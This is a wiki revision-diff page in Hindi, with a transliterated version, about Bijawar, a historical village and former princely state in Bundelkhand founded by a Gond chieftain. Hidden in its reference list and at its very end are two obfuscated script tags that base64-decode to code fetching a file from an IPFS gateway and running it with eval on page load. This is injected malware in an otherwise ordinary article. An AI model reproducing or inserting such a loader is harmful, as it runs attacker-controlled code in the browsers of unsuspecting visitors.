Difference between revisions of "बिजावर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "<references/>" to "<references/> *पुस्तक- ऐतिहासिक स्थानावली, लेखक-विजयेन्द्र कुमार माथुर, प्रकाशन- राजस्थान ग्)
m (Text replacement - "पश्चात " to "पश्चात् ")
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
 
'''बिजावर''' [[बुंदेलखंड]], [[उत्तर प्रदेश]] का एक ऐतिहासिक ग्राम था। यह माना जाता है कि बिजावर ग्राम को विजय सिंह नाम के एक [[गोंड]] सामंत ने बसाया था।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=628|url=}}</ref>
 
'''बिजावर''' [[बुंदेलखंड]], [[उत्तर प्रदेश]] का एक ऐतिहासिक ग्राम था। यह माना जाता है कि बिजावर ग्राम को विजय सिंह नाम के एक [[गोंड]] सामंत ने बसाया था।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=628|url=}}</ref>
  
*विजय सिंह गढ़मंडला नरेश [[संग्राम सिंह]] की सेवा में नियुक्त था। उसके पश्चात यह स्थान [[बुंदेला]] महाराज [[छत्रसाल]] के अधिकार में आ गया और तत्पश्चात उनके उत्तराधिकारी जगतसिंह को उनके अंश के रूप में मिला।
+
*विजय सिंह गढ़मंडला नरेश [[संग्राम सिंह]] की सेवा में नियुक्त था। उसके पश्चात् यह स्थान [[बुंदेला]] महाराज [[छत्रसाल]] के अधिकार में आ गया और तत्पश्चात् उनके उत्तराधिकारी जगतसिंह को उनके अंश के रूप में मिला।
 
*बिजावर [[1947]] तक बुंदेलखंड की प्रख्यात रियासत हुआ करती थी।
 
*बिजावर [[1947]] तक बुंदेलखंड की प्रख्यात रियासत हुआ करती थी।
  
Line 7: Line 7:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
*पुस्तक- ऐतिहासिक स्थानावली, लेखक-विजयेन्द्र कुमार माथुर, प्रकाशन- राजस्थान ग्रंथ अकादमी जयपुर
+
*ऐतिहासिक स्थानावली | विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
  
 
==संबंधित लेख==
 
==संबंधित लेख==

Latest revision as of 07:50, 23 June 2017

bijavar buandelakhand, uttar pradesh ka ek aitihasik gram tha. yah mana jata hai ki bijavar gram ko vijay sianh nam ke ek goand samant ne basaya tha.[1]

  • vijay sianh gadhamandala naresh sangram sianh ki seva mean niyukt tha. usake pashchath yah sthan buandela maharaj chhatrasal ke adhikar mean a gaya aur tatpashchath unake uttaradhikari jagatasianh ko unake aansh ke roop mean mila.
  • bijavar 1947 tak buandelakhand ki prakhyat riyasat hua karati thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 628 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  • aitihasik sthanavali | vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>